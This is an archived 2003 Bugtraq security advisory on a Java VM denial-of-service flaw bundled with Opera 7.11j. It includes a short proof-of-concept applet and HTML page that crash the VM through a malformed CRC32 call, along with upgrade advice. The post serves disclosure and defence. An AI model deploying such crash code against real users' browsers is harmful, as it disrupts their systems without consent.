Opera 7.11 java.util.zip.* Vulnerability

From: Marc Schoenefeld (schonef_at_uni-muenster.de)
Date: 05/11/03

  • Next message: Frog Man: "re: II-Labs Advisory: Remote code execution in YaBBse 1.5.2 (php version)" 
    Date: Sun, 11 May 2003 01:28:59 +0200 (MES)
To: bugtraq@securityfocus.com

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hi,

     the just released Opera 7.11j comes with a java vm (1.4.1_01)
     that is vulnerable to the java.util.zip.* bugs
     that can cause denial of service via Java Applets
     like the one with source printed below.
     Therefore my suggestion towards the Opera deployment
     team is to bundle java 1.4.1_02 which is not vulnerable
     to the java.util.zip-Bugs.
     All 1.3.1 versions are still vulnerable !
     If you already installed java 1.4.1_02 prior to
     installing Opera you are not vulnerable, because
     the most current jvm seems to be chosen by opera
     when running applets.
     If you are interested in the details (not opera-specific),
     read the whole story at www.illegalaccess.org or read:

    http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
    http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
    http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
    http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
    http://developer.java.sun.com/developer/bugParade/bugs/4811917.html

    Sincerely
    Marc Schoenefeld

    The applet code:
    ========CRCApplet.java=======================
     import java.applet.Applet;
    import java.awt.Graphics;

    public class CRCApplet extends Applet{
    public void paint(Graphics g) {
             (new java.util.zip.CRC32()).update(new
    byte[0],Integer.MAX_VALUE-3,4);
    }
    }
    =============================================

    The corresponding HTML
    =======CRCApplet.html======================
    |html>
    |body>
    |applet code=CRCApplet.class width=400 height=400>
    |/applet>
    |/body>
    |/html>
    ===========================================

    - --

    Never be afraid to try something new. Remember, amateurs built the
    ark; professionals built the Titanic. -- Anonymous

    Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (AIX)
    Comment: For info see http://www.gnupg.org

    iD8DBQE+vYs/qCaQvrKNUNQRAqWUAJ9tdtt9uOboP2fq+/ZqhRqE8Fet7gCfffsD
    nBk6PscPB5WQYpqgZaItaDw=
    =uUS/
    -----END PGP SIGNATURE-----

  • Next message: Frog Man: "re: II-Labs Advisory: Remote code execution in YaBBse 1.5.2 (php version)"

    Relevant Pages

    • Re: Problem with applets with Opera browser
      ... Internet Explorer (the applet is loaded there). ... Nothing appears in the Opera Java Console. ... Post a link for the applet that loads in Internet Explorer and I will let ...
      (comp.lang.java.programmer)
    • Re: Panorama in lieu of a TR
      ... Sun's site the installation of Java is shown as working. ... I use Opera as default browser and all shows as OK on Phils site. ... Tools> advanced> plugins shows: ... rectangle and with Java there's the large rectangle with 'applet not ...
      (uk.rec.walking)
    • Embedded WMP Player Java Applet
      ... Also I have discovered this Applet is only signed by MS ... Opera, you will be disappointed & get the message in the ... Opera Java Control Panel: Please upgrade to the Java 2 ... >Netscape security model is no longer supported. ...
      (microsoft.public.windowsmedia.player.web)
    • [Full-Disclosure] Opera/Netscape/Mozilla: Floppy access from untrusted java applet
      ... the problem has nothing to do with java. ... such as a floppy drive. ... You can try the new floppy applet at: ... Remember, amateurs built the ...
      (Full-Disclosure)
    • Technical information about the vulnerabilities fixed by MS-02-52
      ... The patch doesn't fix all of the vulnerabilities we reported, ... Java support in the Internet Zone even after applying the patch gives the ... possibility for a malicious Java Applet to gain control over the system. ... Our original report and information regarding the remaining Java ...
      (NT-Bugtraq)